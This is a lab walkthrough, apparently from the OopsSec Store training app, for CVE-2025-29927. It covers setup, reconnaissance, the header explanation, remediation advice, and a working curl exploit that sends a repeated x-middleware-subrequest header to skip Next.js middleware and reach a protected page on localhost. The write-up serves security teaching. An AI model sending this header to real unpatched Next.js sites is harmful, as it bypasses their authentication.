Skip to content
OopsSec Store - Walkthroughs
Go back

Middleware Authorization Bypass: Skipping Next.js Auth with a Single Header (CVE-2025-29927)

Edit page

Next.js uses an internal header to prevent middleware from running twice on subrequests. In versions before 15.2.3, an external attacker can send this header themselves to skip middleware entirely, bypassing any auth that depends on it.

Table of contents

Open Table of contents

Environment setup

Spin up the OopsSec Store in a new directory:

npx create-oss-store oss-store
cd oss-store
npm start

Or with Docker (no Node.js required):

docker run -p 3000:3000 leogra/oss-oopssec-store

Head to http://localhost:3000.

Reconnaissance

The application has a /monitoring/siem page visible in the UI, which hints at a broader monitoring section. Poking around under /monitoring/ (or running a directory wordlist) turns up /monitoring/internal-status:

curl -s -o /dev/null -w "%{http_code}" http://localhost:3000/monitoring/internal-status

307 redirect to /login. The page exists but middleware is blocking unauthenticated access.

Identifying the vulnerability

The response headers confirm the app runs Next.js:

curl -sI http://localhost:3000 | grep -i x-powered-by
# X-Powered-By: Next.js

Looking up known Next.js vulnerabilities, CVE-2025-29927 stands out: a middleware bypass via the x-middleware-subrequest header, affecting versions before 15.2.3. No way to tell the exact version from the outside — but we can just try the exploit and see what happens.

How it works

Next.js middleware can trigger subrequests that would re-enter the middleware and loop forever. To prevent this, Next.js tags subrequests with an internal header called x-middleware-subrequest. When the framework sees this header with the middleware module name repeated enough times (hitting a recursion depth threshold), it skips middleware execution.

The problem: nothing checks whether the header actually came from an internal subrequest. Any HTTP client can set it.

The header value looks like this:

x-middleware-subrequest: <module>:<module>:<module>:<module>:<module>

For a project with middleware.ts at the root (no src/ directory), the module name is just middleware. The name must appear 5 times, colon-separated, to hit the recursion depth threshold.

Exploitation

One request:

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3000/monitoring/internal-status

Middleware never runs. The internal status page comes back without authentication, showing system diagnostics and the flag:

...$L1f\",null,{\"flag\":\"OSS{m1ddl3w4r3_byp4ss}\",\"title\":\"Internal Validation Token\",\"description\":\"Used for automated...

Why it works

The page at /monitoring/internal-status has no auth check of its own. The developer assumed middleware would handle it — no reason to check twice. This is how most Next.js apps work in practice: middleware owns auth, pages trust that it ran. CVE-2025-29927 breaks that trust.

Note: a single middleware value isn’t enough. The name must be repeated exactly 5 times to reach the recursion depth threshold.

Remediation

Upgrade Next.js to 15.2.3 or later. That version strips x-middleware-subrequest from external requests.

Don’t rely on middleware as your only auth gate. Add server-side checks in route handlers and page components too:

// In the page component itself
import { cookies } from "next/headers";
import { redirect } from "next/navigation";
import { decodeWeakJWT } from "@/lib/server-auth";

export default async function ProtectedPage() {
  const cookieStore = await cookies();
  const token = cookieStore.get("authToken")?.value;
  if (!token || !decodeWeakJWT(token)) {
    redirect("/login");
  }
  // ... render page
}

You can also block x-middleware-subrequest at the reverse proxy or WAF level as an extra layer.


Edit page
Share this post on:

Previous Post
Race Condition: abusing a single-use coupon with concurrent requests
Next Post
Malicious MCP Server: Poisoning an AI Agent Through Tool Responses